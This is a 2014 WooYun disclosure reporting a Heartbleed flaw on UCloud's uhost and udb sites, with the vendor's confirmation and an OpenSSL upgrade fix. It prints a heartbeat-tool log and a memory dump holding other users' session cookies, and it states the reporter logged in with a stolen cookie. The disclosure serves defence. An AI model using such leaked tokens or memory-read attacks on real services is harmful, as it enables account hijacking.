UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息（成功登录）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-056051

漏洞标题：UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息（成功登录）

漏洞作者：海绵宝宝

提交时间：2014-04-09 10:48

修复时间：2014-05-24 10:48

公开时间：2014-05-24 10:48

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-04-09：细节已通知厂商并且等待厂商处理中
2014-04-09：厂商已经确认，细节仅向厂商公开
2014-04-19：细节向核心白帽子及相关领域专家公开
2014-04-29：细节向普通白帽子公开
2014-05-09：细节向实习白帽子公开
2014-05-24：细节向公众公开

简要描述：

UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息

详细说明：

https://uhost.ucloud.cn
https://udb.ucloud.cn
获得敏感信息

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 3187
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 02 01 04 03  ....#...........
  00e0: 05 03 02 03 04 02 02 02 00 12 00 00 03 04 02 02  ................
  00f0: 02 35 EC 72 16 9E 9C 09 36 BE 3F 30 0B 7E 66 45  .5.r....6.?0.~fE
  0100: 0B 1F A5 08 8F AE 95 D0 0A CF 4E 8B B5 D6 7A 56  ..........N...zV
  0110: 0E 8C 3E 35 CC 0C 13 78 39 D5 E4 8A 43 9A E5 DF  ..>5...x9...C...
  0120: 9C 62 C5 CA 60 CF 07 51 DD C1 1A 3D 45 86 23 FE  .b..`..Q...=E.#.
  0130: 7C A9 56 D2 60 AE 69 23 8E A0 BB FA 8F 96 C9 C7  |.V.`.i#........
  0140: 02 91 30 E5 F4 94 EF 3A 61 2A 1B 0D 46 48 2D 66  ..0....:a*..FH-f
  0150: 64 E6 12 5A 1E 3A A4 A2 46 D5 B9 5F 21 46 EC FB  d..Z.:..F.._!F..
  0160: F6 08 DD 08 05 45 AB 32 56 3D 87 01 C6 A6 73 01  .....E.2V=....s.
  0170: AE 3E A6 D1 6E 04 09 2C 00 05 00 05 01 00 00 00  .>..n..,........
  0180: 00 47 42 4B 2C 75 74 66 2D 38 3B 71 3D 30 2E 37  .GBK,utf-8;q=0.7
  0190: 2C 2A 3B 71 3D 30 2E 33 0D 0A 43 6F 6F 6B 69 65  ,*;q=0.3..Cookie
  01a0: 3A 20 72 65 66 65 72 72 65 72 5F 75 72 6C 3D 68  : referrer_url=h
  01b0: 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2E  ttp%3A%2F%2Fwww.
  01c0: 67 6F 6F 67 6C 65 2E 63 6F 6D 2E 68 6B 25 32 46  google.com.hk%2F
  01d0: 75 72 6C 25 33 46 73 61 25 33 44 74 25 32 36 72  url%3Fsa%3Dt%26r
  01e0: 63 74 25 33 44 6A 25 32 36 71 25 33 44 55 43 6C  ct%3Dj%26q%3DUCl
  01f0: 6F 75 64 25 32 36 73 6F 75 72 63 65 25 33 44 77  oud%26source%3Dw
  0200: 65 62 25 32 36 63 64 25 33 44 31 25 32 36 76 65  eb%26cd%3D1%26ve
  0210: 64 25 33 44 30 43 44 67 51 46 6A 41 41 25 32 36  d%3D0CDgQFjAA%26
  0220: 75 72 6C 25 33 44 25 32 35 36 38 25 32 35 37 34  url%3D%2568%2574
  0230: 25 32 35 37 34 25 32 35 37 30 25 32 35 37 33 25  %2574%2570%2573%
  0240: 32 35 33 61 25 32 35 32 66 25 32 35 32 66 25 32  253a%252f%252f%2
  0250: 35 37 37 25 32 35 37 37 25 32 35 37 37 25 32 35  577%2577%2577%25
  0260: 32 65 25 32 35 37 35 25 32 35 36 33 25 32 35 36  2e%2575%2563%256
  0270: 63 25 32 35 36 66 25 32 35 37 35 25 32 35 36 34  c%256f%2575%2564
  0280: 25 32 35 32 65 25 32 35 36 33 25 32 35 36 65 25  %252e%2563%256e%
  0290: 32 35 32 66 25 32 36 65 69 25 33 44 56 7A 6B 36  252f%26ei%3DVzk6
  02a0: 55 38 47 48 45 75 65 59 69 41 65 51 6A 6F 44 51  U8GHEueYiAeQjoDQ
  02b0: 41 51 25 32 36 75 73 67 25 33 44 41 46 51 6A 43  AQ%26usg%3DAFQjC
  02c0: 4E 45 49 41 56 4F 46 4B 48 71 4B 6D 65 78 45 36  NEIAVOFKHqKmexE6
  02d0: 73 46 44 56 70 53 42 50 52 74 61 46 51 25 32 36  sFDVpSBPRtaFQ%26
  02e0: 62 76 6D 25 33 44 62 76 2E 36 33 39 33 34 36 33  bvm%3Dbv.6393463
  02f0: 34 25 32 43 64 2E 61 47 63 25 32 36 63 61 64 25  4%2Cd.aGc%26cad%
  0300: 33 44 72 6A 74 3B 20 74 67 74 3D 54 47 43 2D 31  3Drjt; tgt=TGC-1
  0310: 33 39 36 33 32 34 37 32 35 72 35 42 32 36 38 46  396324725r5B268F
  0320: 33 46 42 32 37 45 30 46 39 34 45 34 3B 20 50 48  3FB27E0F94E4; PH
  0330: 50 53 45 53 53 49 44 3D 53 54 2D 31 33 39 36 33  PSESSID=ST-13963
  0340: 33 38 33 32 33 72 31 30 46 30 31 35 31 31 34 33  38323r10F0151143
  0350: 31 30 39 32 41 30 32 41 3B 20 5F 5F 75 74 6D 61  1092A02A; __utma
  0360: 3D 31 31 31 33 38 39 33 33 32 2E 31 31 35 35 32  =111389332.11552
  0370: 33 38 38 36 30 2E 31 33 39 36 33 33 34 31 37 38  38860.1396334178
  0380: 2E 31 33 39 36 33 33 34 31 37 38 2E 31 33 39 36  .1396334178.1396
  0390: 33 33 38 33 32 36 2E 32 3B 20 5F 5F 75 74 6D 63  338326.2; __utmc
  03a0: 3D 31 31 31 33 38 39 33 33 32 3B 20 5F 5F 75 74  =111389332; __ut
  03b0: 6D 7A 3D 31 31 31 33 38 39 33 33 32 2E 31 33 39  mz=111389332.139
  03c0: 36 33 33 38 33 32 36 2E 32 2E 32 2E 75 74 6D 63  6338326.2.2.utmc
  03d0: 73 72 3D 75 64 62 2E 75 63 6C 6F 75 64 2E 63 6E  sr=udb.ucloud.cn
  03e0: 7C 75 74 6D 63 63 6E 3D 28 72 65 66 65 72 72 61  |utmccn=(referra
  03f0: 6C 29 7C 75 74 6D 63 6D 64 3D 72 65 66 65 72 72  l)|utmcmd=referr
  0400: 61 6C 7C 75 74 6D 63 63 74 3D 2F 75 64 62 2F 63  al|utmcct=/udb/c
  0410: 72 65 61 74 65 3B 20 48 6D 5F 6C 76 74 5F 36 31  reate; Hm_lvt_61
  0420: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33  7e36e9c35ee2ab63
  0430: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31  cf90b4fd2a3d3d=1
  0440: 33 39 36 30 38 37 36 34 36 2C 31 33 39 36 33 32  396087646,139632
  0450: 34 37 30 36 3B 20 48 6D 5F 6C 70 76 74 5F 36 31  4706; Hm_lpvt_61
  0460: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33  7e36e9c35ee2ab63
  0470: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31  cf90b4fd2a3d3d=1
  0480: 33 39 36 33 33 39 32 35 35 0D 0A 0D 0A 5E 8B B7  396339255....^..
  0490: 90 FA 5A 1A 12 16 BE 41 D1 6B 55 2F 8E B6 5E 45  ..Z....A.kU/..^E
  04a0: EE 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E  ................
  04b0: E6 06 0F 6F 2E 3C 87 CC 64 4D 64 DE F8 07 8A 0C  ...o.<..dMd.....
  04c0: A4 A6 68 A3 B9 6A 84 4E A9 F4 AD 69 20 86 44 58  ..h..j.N...i .DX
  04d0: 46 D9 57 E1 E3 1B 1E 70 0B F6 EE 32 F2 C4 5E D1  F.W....p...2..^.
  04e0: 6A 7C 2B 5A 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  j|+Z............
  04f0: 94 56 04 9F A6 9A 4B 45 8E E9 2B 75 74 74 90 D6  .V....KE..+utt..
  0500: 31 CD C8 BC 84 60 BD 1D 96 69 11 9E 67 88 F0 F9  1....`...i..g...
  0510: 55 8E FC 23 CF 36 49 3E 26 AD E4 FE A5 35 E4 42  U..#.6I>&....5.B
  0520: A1 49 D7 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  .I..............
  0530: 17 03 01 00 20 75 6D 48 7F AD 01 FF CC FE 26 22  .... umH......&"
  0540: 03 15 84 0A 45 4E 86 FA 66 B3 0A 0A 0A 0A 0A 0A  ....EN..f.......
  0550: 0A 0A 0A 0A 0A 17 03 01 00 90 8B C7 80 27 82 B4  .............'..
  0560: E9 AC 0D 66 40 11 53 1B 09 62 09 0E 8E 0C 0F C0  ...f@.S..b......
  0570: 3F BE 2A 64 13 88 24 36 90 0C 7E CB 16 1C 41 FF  ?.*d..$6..~...A.
  0580: 72 9B BB 20 F4 B1 18 03 E7 1A 09 7A F3 FF 95 8E  r.. .......z....
  0590: 73 17 B7 9D C8 34 E9 A1 CD F2 EF 2F 5C BE E0 3C  s....4...../\..<
  05a0: 51 54 48 84 10 62 E3 7D 34 5F 00 E7 26 1A 2C CB  QTH..b.}4_..&.,.
  05b0: F8 74 B8 D6 A0 8F 68 7A A4 ED C4 D5 F5 4C 42 3D  .t....hz.....LB=
  05c0: 0B DE D0 F4 43 8F 5F 4D 93 05 10 50 8C 50 A9 72  ....C._M...P.P.r
  05d0: E2 67 59 BC 06 F0 6A CC 7F C0 AC 45 89 44 07 7F  .gY...j....E.D..
  05e0: 83 F9 99 70 9A C4 B1 55 3D 95 8F 5F 4D 93 05 10  ...p...U=.._M...
  05f0: 50 8C 50 A9 72 E2 67 59 BC 06 F0 6A CC 7F C0 AC  P.P.r.gY...j....
  0600: 45 89 44 07 7F 83 F9 99 70 9A C4 B1 55 3D 95 65  E.D.....p...U=.e
  0610: 39 63 33 35 65 65 32 61 62 36 33 63 66 39 30 62  9c35ee2ab63cf90b
  0620: 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 39 34  4fd2a3d3d=139694
  0630: 34 35 30 36 0D 0A 49 66 2D 4D 6F 64 69 66 69 65  4506..If-Modifie
  0640: 64 2D 53 69 6E 63 65 3A 20 54 68 75 2C 20 31 39  d-Since: Thu, 19
  0650: 20 44 65 63 20 32 30 31 33 20 30 34 3A 35 39 3A   Dec 2013 04:59:
  0660: 31 35 20 47 4D 54 0D 0A 0D 0A CC 16 AB 46 AE D2  15 GMT.......F..
  0670: DE C6 52 94 19 C5 50 23 93 E4 01 FF E9 1C C5 BE  ..R...P#........
  0680: 64 23 EB A9 1F 37 D1 0A 68 F9 12 24 74 68 69 6E  d#...7..h..$thin
  0690: 6B 70 68 70 2E 63 6E 25 32 36 64 74 64 25 33 44  kphp.cn%26dtd%3D
  06a0: 31 38 3B 20 48 6D 5F 6C 76 74 5F 36 31 37 65 33  18; Hm_lvt_617e3
  06b0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39  6e9c35ee2ab63cf9
  06c0: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36  0b4fd2a3d3d=1396
  06d0: 39 34 32 30 34 34 2C 31 33 39 36 39 34 32 39 30  942044,139694290
  06e0: 34 3B 20 48 6D 5F 6C 70 76 74 5F 36 31 37 65 33  4; Hm_lpvt_617e3
  06f0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39  6e9c35ee2ab63cf9
  0700: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36  0b4fd2a3d3d=1396
  0710: 39 34 32 39 31 31 0D 0A 49 66 2D 4D 6F 64 69 66  942911..If-Modif
  0720: 69 65 64 2D 53 69 6E 63 65 3A 20 54 75 65 2C 20  ied-Since: Tue, 
  0730: 32 34 20 44 65 63 20 32 30 31 33 20 30 37 3A 34  24 Dec 2013 07:4
  0740: 34 3A 31 38 20 47 4D 54 0D 0A 0D 0A E4 30 B1 B7  4:18 GMT.....0..
  0750: 3D F8 B0 BE 6C B6 61 41 E7 03 DE AF 34 30 6C 64  =...l.aA....40ld
  0760: 33 30 6C 76 32 33 2D 2D 73 74 31 35 73 61 31 32  30lv23--st15sa12
  0770: 6C 74 32 30 6C 64 31 36 6C 76 31 36 2D 73 74 31  lt20ld16lv16-st1
  0780: 32 73 61 31 30 2D 73 74 31 32 73 61 31 30 25 32  2sa10-st12sa10%2
  0790: 36 72 75 72 6C 25 33 44 68 74 74 70 25 32 35 33  6rurl%3Dhttp%253
  07a0: 41 25 32 35 32 46 25 32 35 32 46 77 77 33 38 2E  A%252F%252Fww38.
  07b0: 6C 69 6E 75 78 66 61 62 2E 63 78 25 32 35 32 46  linuxfab.cx%252F
  07c0: 25 32 36 72 65 66 25 33 44 68 74 74 70 25 32 35  %26ref%3Dhttp%25
  07d0: 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2E  3A%252F%252Fwww.
  07e0: 73 74 75 64 79 2D 61 72 65 61 2E 6F 72 67 25 32  study-area.org%2
  07f0: 35 32 46 6C 69 6E 6B 2E 68 74 6D 0D 0A 0D 0A 5D  52Flink.htm....]
  0800: 11 C6 69 CF 01 65 1F B3 5D 31 CA 9E 61 9C D3 2E  ..i..e..]1..a...
  0810: 75 74 6D 63 73 72 3D 28 64 69 72 65 63 74 29 7C  utmcsr=(direct)|
  0820: 75 74 6D 63 63 6E 3D 28 64 69 72 65 63 74 29 7C  utmccn=(direct)|
  0830: 75 74 6D 63 6D 64 3D 28 6E 6F 6E 65 29 0D 0A 0D  utmcmd=(none)...
  0840: 0A 0C E2 A8 8B 73 71 FE 0D 53 41 81 DC BE 61 3D  .....sq..SA...a=
  0850: FA 46 43 32 32 35 39 0D 0A 0D 0A FD 2C 93 BB C8  .FC2259.....,...
  0860: 4A 58 D6 25 CC 83 48 67 FE 37 C9 FE 2E D6 0C B2  JX.%..Hg.7......
  0870: DE 4D 85 23 37 04 6B 5A 0C 0C 0C 0C 0C 0C 0C 0C  .M.#7.kZ........
  0880: 0C 0C 0C 0C 0C DD 2B BC 8B CE FE FE 6D EE 75 A7  ......+.....m.u.
  0890: 2B 92 E8 7A 94 B8 63 AF 87 B4 74 3D 2F 0D 0A 0D  +..z..c...t=/...
  08a0: 0A 95 A9 40 DA B2 55 E0 62 72 AF AA AC AB 66 06  ...@..U.br....f.
  08b0: 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  f...............
  08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  09a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  09b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  09c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  09d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  09e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  09f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

漏洞证明：

成功利用cookie登录,可进行下一步攻击

修复方案：

升级openssl

版权声明：转载请注明来源海绵宝宝@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-04-09 15:25

厂商回复：

感谢您对UCLOUD 的支持，还想要提一下，更新openssl 时有些依赖程序，如果是动态链接，需要重启服务，静态连接则需要重新编译服务了，例如: Nginx

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-056051

漏洞标题：UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息（成功登录）

相关厂商：UCloud

漏洞作者：海绵宝宝

提交时间：2014-04-09 10:48

修复时间：2014-05-24 10:48

公开时间：2014-05-24 10:48

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源海绵宝宝@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-056051

漏洞标题：UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息（成功登录）

相关厂商：UCloud

漏洞作者： 海绵宝宝

提交时间：2014-04-09 10:48

修复时间：2014-05-24 10:48

公开时间：2014-05-24 10:48

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-056051"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 海绵宝宝@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：海绵宝宝

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源海绵宝宝@乌云